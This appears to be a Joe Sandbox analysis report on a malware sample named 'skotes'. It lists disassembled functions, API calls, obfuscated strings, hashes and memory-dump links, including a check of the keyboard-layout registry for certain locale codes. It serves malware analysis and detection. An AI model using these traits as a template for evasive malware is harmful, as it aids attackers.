Associated: 00000006.00000002.2943303939.00000000009F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009FF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2950753311.0000000000A00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2953745312.0000000000BA4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2954201170.0000000000BA6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e0000_skotes.jbxd

Yara matches

Similarity

API ID: AccountLookupName
String ID: GSTmfV==$ISNmfV==$RySfdMLx
API String ID: 1484870144-2309319047
Opcode ID: 3652b661902b4d313eec7b2f4ce4b7070e81801f32de189147409c8e5f8d2f98
Instruction ID: 4d76d2fad704230957c8c4bf38d906d865433a8b3fb5c02c471fac94a1dfa1ea
Opcode Fuzzy Hash: 3652b661902b4d313eec7b2f4ce4b7070e81801f32de189147409c8e5f8d2f98
Instruction Fuzzy Hash: C991B5B19012589BDB28DB28CC85BEDB77AEB45304F4045EDF50997282DB359BC4CFA8

Function 006FD3E2 Relevance: .2, Instructions: 172
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___std_exception_copy.LIBVCRUNTIME ref: 006E24BE

Memory Dump Source

Source File: 00000006.00000002.2941024413.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000006.00000002.2940530264.00000000006E0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2941024413.0000000000742000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2942704898.0000000000749000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.000000000074B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009FF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2950753311.0000000000A00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2953745312.0000000000BA4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2954201170.0000000000BA6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e0000_skotes.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: 0c5c8b738fc595ff21db6a877b38c0bf551bc0f60edbf3abf4fcbd394445bfe2
Instruction ID: 8b65ba6d09d1afba853578bf18189da33420682fff7a234cc4a5dea7c3ff5a52
Opcode Fuzzy Hash: 0c5c8b738fc595ff21db6a877b38c0bf551bc0f60edbf3abf4fcbd394445bfe2
Instruction Fuzzy Hash: 1151BFB6A0160ACBDB15CF58D8857B9BBF2FB48314F24C52AD605EB391D338AD41CB90

Function 006F2F10 Relevance: 21.9, APIs: 1, Strings: 11, Instructions: 910
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

stoi argument out of range, xrefs: 006F4359
Fw==, xrefs: 006F378E
Hykl, xrefs: 006F387F
WTw=, xrefs: 006F2F5E
WGpm, xrefs: 006F3CC9
invalid stoi argument, xrefs: 006F434A
246122658369, xrefs: 006F2F78
WX f, xrefs: 006F3BDE
V2Te, xrefs: 006F3EB0
5120, xrefs: 006F3BAF, 006F3C9A
", xrefs: 006F3F89

Memory Dump Source

Source File: 00000006.00000002.2941024413.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000006.00000002.2940530264.00000000006E0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2941024413.0000000000742000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2942704898.0000000000749000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.000000000074B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009FF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2950753311.0000000000A00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2953745312.0000000000BA4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2954201170.0000000000BA6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e0000_skotes.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
String ID: "$246122658369$5120$Fw==$Hykl$V2Te$WGpm$WTw=$WX f$invalid stoi argument$stoi argument out of range
API String ID: 4078500453-1402436090
Opcode ID: dfb27ba61a6a945718e8afbfc060a1e817a90fd2f91516198056c209e6ceecdd
Instruction ID: e6855657a803a29f6396c91fb29e1ae7a8acefc169afe593cb8faee3debfa93e
Opcode Fuzzy Hash: dfb27ba61a6a945718e8afbfc060a1e817a90fd2f91516198056c209e6ceecdd
Instruction Fuzzy Hash: 0C722771A0024C9BDF18EF78CD467AEBBB7AF46300F50458CE505A7386DB359B848B96

Function 006E7D30 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 426
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 006E7ED3

Strings

X, xrefs: 006E7DBD
0, xrefs: 006E7DEA
JjssPV==, xrefs: 006E81E2
hK, xrefs: 006E7F75, 006E805A, 006E8102, 006E81AA, 006E8252
JjsrQV==, xrefs: 006E8092
JjssOl==, xrefs: 006E813A
JjsrPl==, xrefs: 006E828A

Memory Dump Source

Source File: 00000006.00000002.2941024413.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000006.00000002.2940530264.00000000006E0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2941024413.0000000000742000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2942704898.0000000000749000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.000000000074B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009FF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2950753311.0000000000A00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2953745312.0000000000BA4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2954201170.0000000000BA6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e0000_skotes.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: 0$JjsrPl==$JjsrQV==$JjssOl==$JjssPV==$X$hK
API String ID: 1721193555-1560825961
Opcode ID: 44c17fe3c2d39cf3bbc9dfb1f8a3df8ad2916304467a3ac268cefbea59e4c435
Instruction ID: b24444e6a29481d435f031002270671ef6c5ce4bfcb7d0ff446d285de75d9961
Opcode Fuzzy Hash: 44c17fe3c2d39cf3bbc9dfb1f8a3df8ad2916304467a3ac268cefbea59e4c435
Instruction Fuzzy Hash: E8E12870E013849BDB14BB69CD0B3AD7A73AB42714FA4428CE4196B3C2DB395F9587C6

Function 006E5EE0 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 340
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,000F003F,?), ref: 006E5F13

Strings

00000423, xrefs: 006E60FA
00000419, xrefs: 006E6098
00000422, xrefs: 006E60C9
Keyboard Layout\Preload, xrefs: 006E6054
0000043f, xrefs: 006E612B

Memory Dump Source

Source File: 00000006.00000002.2941024413.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000006.00000002.2940530264.00000000006E0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2941024413.0000000000742000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2942704898.0000000000749000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.000000000074B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009FF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2950753311.0000000000A00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2953745312.0000000000BA4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2954201170.0000000000BA6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e0000_skotes.jbxd

Yara matches

Similarity

API ID: Open
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 71445658-3963862150
Opcode ID: cdf103860abc546568c7acc821d4e3b61afaa65cc859eda2807d822ea3372183
Instruction ID: 594ddf89bb6d2f850d6b1c09bab9924bba8c9578fe5c9e87f6ef9b9fe74b3266
Opcode Fuzzy Hash: cdf103860abc546568c7acc821d4e3b61afaa65cc859eda2807d822ea3372183
Instruction Fuzzy Hash: 63D1B1719012589BEB24DF14CC84BEEB77AAF15340F5042D8F508E7292DB74ABA48F55

Function 006E8380 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 006E8524

Strings

X, xrefs: 006E8412
0, xrefs: 006E843F

Memory Dump Source

Source File: 00000006.00000002.2941024413.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000006.00000002.2940530264.00000000006E0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2941024413.0000000000742000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2942704898.0000000000749000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.000000000074B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009FF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2950753311.0000000000A00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2953745312.0000000000BA4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2954201170.0000000000BA6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e0000_skotes.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: 0$X
API String ID: 1721193555-3655275105
Opcode ID: 735c815efc284dda6d9c9723761dc19b9d7fd5d1548e37075211173bb8a334d3
Instruction ID: 9497dd596ce7cd576ebb37ac65b6cce02ffde3bd805ce7691522569cffafb981
Opcode Fuzzy Hash: 735c815efc284dda6d9c9723761dc19b9d7fd5d1548e37075211173bb8a334d3
Instruction Fuzzy Hash: 82513670D013889FDB24EB69CD497EEB776DB45314F5042A8E809A73C1EF349E848B95

Function 0071B04B Relevance: 1.5, APIs: 1, Instructions: 33
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,B9457B38,?,?,006FD3FC,B9457B38,?,006F7A8B,?,?,?,?,?,?,006E7465,?), ref: 0071B07E

Memory Dump Source

Source File: 00000006.00000002.2941024413.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000006.00000002.2940530264.00000000006E0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2941024413.0000000000742000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2942704898.0000000000749000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.000000000074B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009FF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2950753311.0000000000A00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2953745312.0000000000BA4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2954201170.0000000000BA6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e0000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 860c5c3cda65dfb09efbde90ed44f6d5c992b8f46d2350cf8c0e524f7e1086f4
Instruction ID: e746cf3d1df284c67c4b43d80e9165f87ab007391d4b3304276a4b3970f8256a
Opcode Fuzzy Hash: 860c5c3cda65dfb09efbde90ed44f6d5c992b8f46d2350cf8c0e524f7e1086f4
Instruction Fuzzy Hash: 6EE06D35641226A6EB31327D9C46BEBB648DB4A3A0F161211AD68961D0EB6CDCC081E1

Function 04F30BC4 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2977428792.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f30000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a714b59bc6c7e21bfc927ff4e742903628b8291b375517b62b51f4eb9fb072a
Instruction ID: 67b91fcbb73a0eefc698e2e4ccfa3841ee37727471f8c13ed2ebf21dc504171a
Opcode Fuzzy Hash: 5a714b59bc6c7e21bfc927ff4e742903628b8291b375517b62b51f4eb9fb072a
Instruction Fuzzy Hash: 781125F724D614BFA14251852B449FABB6EE6D2772330842BF843C6506FAE41A0BB131

Function 04F30BE3 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2977428792.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f30000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc11dc91dc5970d1b378846298545d0077a86d3edf15cfff7c6f87dfa118e17b
Instruction ID: 95ee5b005707ac3f2dcddf0d56cf73e795c05c8c9a152ca75d66cc33efd4335c
Opcode Fuzzy Hash: bc11dc91dc5970d1b378846298545d0077a86d3edf15cfff7c6f87dfa118e17b
Instruction Fuzzy Hash: 58016BB364D214FFA20295895A444F977AEFBD3771330441BF802C650AFB956916B121

Function 04F30CC3 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2977428792.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f30000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c273e27f1b01f157405f47c70c0405dd3f75b16fa5a1fd61c915926337c19310
Instruction ID: a7dc4b79be664d8586dd7c20a19253c2287fd129940cad73aff8c2c51ad240aa
Opcode Fuzzy Hash: c273e27f1b01f157405f47c70c0405dd3f75b16fa5a1fd61c915926337c19310
Instruction Fuzzy Hash: 16F027BB74E200EEE10144852B10AF6B7A8FBA1EB27304423F84395005FAE4250FB561

Function 04F30C5C Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2977428792.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f30000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c4e9c57b9c776be8c54e0113df95ad924384a1309dcdcd5476da6e55e19b41b
Instruction ID: 72e5294d72eb5582a1c031c18ce38847df58cd4edcc670883861fcbf1433122e
Opcode Fuzzy Hash: 6c4e9c57b9c776be8c54e0113df95ad924384a1309dcdcd5476da6e55e19b41b
Instruction Fuzzy Hash: E0E092BB38D110EDB04145C92B108F9A76DF7E2AB23308423F843C010AFE942A0FB132

Function 04F30C19 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2977428792.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f30000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16ceb44abbf1f0bc774701e64e7c119167415df623130f820bbac677f0985b72
Instruction ID: 142644b918b955d129deb5a83bea2d83ea0ec5af7f19d08d7d3145b89907cfac
Opcode Fuzzy Hash: 16ceb44abbf1f0bc774701e64e7c119167415df623130f820bbac677f0985b72
Instruction Fuzzy Hash: 6EE04FB778E610EDA04141892B549B9A6ADE7E2AB23304427F843D150ABE942A0BB136

Function 04F30C82 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2977428792.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4f30000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f10c676f1043f57862b50de6fbf8f950088b19570c3fe82a4dcf6860ad418efa
Instruction ID: ed38dc5aebb1833ae98a1c583c9ca0bf8756477c24ceb98a413330c6810ab8a1
Opcode Fuzzy Hash: f10c676f1043f57862b50de6fbf8f950088b19570c3fe82a4dcf6860ad418efa
Instruction Fuzzy Hash: 33E02BB360D591CED24242A4151C5357BA5AA5267332402A7E4D28D18BFE462207E322

Non-executed Functions

Function 007231A8 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00723323

Strings

1#QNAN, xrefs: 007244C1
1#IND, xrefs: 007244B3
1#INF, xrefs: 007244DE
1#SNAN, xrefs: 007244BA

Memory Dump Source

Source File: 00000006.00000002.2941024413.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000006.00000002.2940530264.00000000006E0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2941024413.0000000000742000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2942704898.0000000000749000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.000000000074B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009FF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2950753311.0000000000A00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2953745312.0000000000BA4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2954201170.0000000000BA6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e0000_skotes.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 5efbebb363b1657d966f007cea04c1deb176dd155b0e08cbd6a984f2cc9085f7
Instruction ID: 85a0426646a26a0321fbc48de8fe98c269d89c67f69d23792b902c1da274d340
Opcode Fuzzy Hash: 5efbebb363b1657d966f007cea04c1deb176dd155b0e08cbd6a984f2cc9085f7
Instruction Fuzzy Hash: 23C21871E086288FDB25CE28ED447EAB7B5EB48315F1441EAD84DE7241E77DAE818F40

Function 00722D10 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2941024413.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000006.00000002.2940530264.00000000006E0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2941024413.0000000000742000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2942704898.0000000000749000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.000000000074B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009FF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2950753311.0000000000A00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2953745312.0000000000BA4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2954201170.0000000000BA6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e0000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
Instruction ID: c4f16baa481098d4386634dcad363fd8ee4fb5cdfccb554459c1ecaa0e6afead
Opcode Fuzzy Hash: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
Instruction Fuzzy Hash: 4BF13E71E002299FDF14CFA8D9806AEB7B1FF48314F25826AD919AB345D735AE41CB90

Function 006FCBEA Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,006FCF52,?,?,?,?,006FCF87,?,?,?,?,?,?,006FC4FD,?,00000001), ref: 006FCC03

Memory Dump Source

Source File: 00000006.00000002.2941024413.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000006.00000002.2940530264.00000000006E0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2941024413.0000000000742000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2942704898.0000000000749000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.000000000074B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009FF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2950753311.0000000000A00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2953745312.0000000000BA4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2954201170.0000000000BA6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e0000_skotes.jbxd

Yara matches

Similarity

API ID: Time$FilePreciseSystem
String ID:
API String ID: 1802150274-0
Opcode ID: dcb712cd64251841f8466e4ef9af0aa2604f94431a573ec5a7a03e257b556a86
Instruction ID: 21cd58a52c23d782a458c905cc7b24e058d542e2c84fec66cee55376d8ec411a
Opcode Fuzzy Hash: dcb712cd64251841f8466e4ef9af0aa2604f94431a573ec5a7a03e257b556a86
Instruction Fuzzy Hash: E6D0223658203CD3CA062B84EC008BEBB499B02BB4300A122EF0C93220CA147C004BE8

Function 00717F36 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 007180B2

Memory Dump Source

Source File: 00000006.00000002.2941024413.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000006.00000002.2940530264.00000000006E0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2941024413.0000000000742000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2942704898.0000000000749000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.000000000074B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009FF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2950753311.0000000000A00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2953745312.0000000000BA4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2954201170.0000000000BA6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e0000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction ID: 975e2f09b89065b54af75483c6c69e5e8f8312414227f4f9ef14fe227979ad53
Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction Fuzzy Hash: 16514B3160864C9ADB7C4A2C889A7FF67AE9B15304F14051DE482E72D2CE5E9ECFD253

Function 006E4DE0 Relevance: .7, Instructions: 701COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2941024413.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000006.00000002.2940530264.00000000006E0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2941024413.0000000000742000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2942704898.0000000000749000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.000000000074B000.00000040.00000001.01000000.00000007.sdmpDownload File
